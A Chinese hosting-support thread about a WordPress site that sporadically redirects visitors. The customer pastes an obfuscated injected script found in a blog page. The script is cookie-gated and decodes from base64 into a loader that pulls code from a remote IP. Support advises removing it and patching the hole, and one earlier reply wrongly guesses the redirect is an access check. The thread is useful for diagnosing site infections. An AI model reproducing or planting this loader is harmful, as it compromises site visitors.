问:这个wordpress用的正版主题和插件。
在访问过程中,偶尔浏览时,跳转到newsforyou.pro 这个网站。
大概过5天,出现过两次。
我就不知道是否是挂马,还是有病毒,请排查一下,谢谢。
,怀疑网站中病毒了,请排查一下。
答:您好
我们检查主机正常,多次访问也并未出现跳转的情况,请问是在什么情况下出现跳转的,比如是做什么操作吗?,非常感谢您长期对我司的支持.由此给您带来的不便之处,敬请原谅!谢谢!
问:没在主页,浏览内页时。
找到从那里跳过去的了,从内页,这里:
http://www.pandawego.com/blog/animal-bonsai/
然后点一张图片,就跳了。
答:您好,核实您对应说反馈的情况,其对应跳转到的地址,其是一个访问验证检查,感觉有点像是对应一个访问验证拦截,避免网站访问频率过高等情况,该问题请核实一下您对应是否近期有在网站后台设置什么访问防护插件等,非常感谢您长期对我司的支持!
问:找到病毒代码了:
view-source:http://www.pandawego.com/blog/animal-bonsai/
<!–codes_iframe–><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )" e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\ ^])/g,"\\\\$1") "=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3 86400),date=new Date((new Date).getTime() 86400);document.cookie="redirect=" time "; path=/; expires=" date.toGMTString(),document.write('<script src="' src '"><\\/script>')} </script><!–/codes_iframe–></p>
在这里。
怎么进一步处理呢?
答:您好
1、找到代码后请从相应文件中将代码删除即可,建议您联系程序开发商为您协助处理。并让程序开发商为您修复漏洞,若不修复,仍有被入侵的可能。
2、该问题是程序方面问题,若需我司协助您清理挂马,请您提交对应工单:【虚拟主机/数据库问题】—【网站类问题】—【清理网站挂马代码和非法信息】,会涉及到费用,另外,我司只能帮您清理挂马,无法帮您修复漏洞,请您知悉,非常感谢你的支持!